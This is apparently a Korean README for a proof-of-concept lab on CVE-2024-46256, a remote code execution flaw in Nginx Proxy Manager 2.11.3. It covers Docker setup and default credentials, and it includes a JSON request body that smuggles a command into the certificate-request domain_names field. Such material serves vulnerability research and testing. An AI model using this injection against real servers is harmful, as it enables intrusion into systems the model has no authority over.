CVE-2024-46256 tool# CVE-2024-46256 Nginx Proxy Manager RCE 취약점 분석
## 환경 구축
### 1. Nginx Proxy Manager 2.11.3 환경 실행
```bash
docker-compose up -d
```
또는 자동 스크립트를 사용할 수 있습니다:
```bash
python setup_environment.py
```
### 2. Nginx Proxy Manager 접속
- URL: http://localhost:81
- 초기 설정을 완료한 후 테스트 진행
- 기본 관리자 계정으로 로그인 (이메일: admin@example.com / 비밀번호: changeme)
- 인증서 발급 관련 기능 접근 권한 확인
## 취약점 정보
- **CVE ID**: CVE-2024-46256
- **제품**: Nginx Proxy Manager
- **버전**: 2.11.3
- **취약점 유형**: Remote Code Execution (RCE)
- **CVSS**: High
## PoC 코드
PoC는 인증된 사용자가 인증서 발급(예: Let's Encrypt) 요청 과정에서 도메인 이름 필드에 템플릿/명령 주입을 수행하여 RCE를 유발합니다.
예시 페이로드(개념 예시):
```json
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "admin@example.com"
},
"provider": "letsencrypt"
}
```
## 분석 환경
- OS: Windows 10
- Docker: 최신 버전
- Nginx Proxy Manager: 2.11.3
[4.0K] /data/pocs/3b809524eb2c6ecd874231d6bc4da96668a2787c
├── [ 504] docker-compose.yml
├── [8.8K] poc_cve_2024_46256_Tool.py
└── [1.2K] README.md
1 directory, 3 files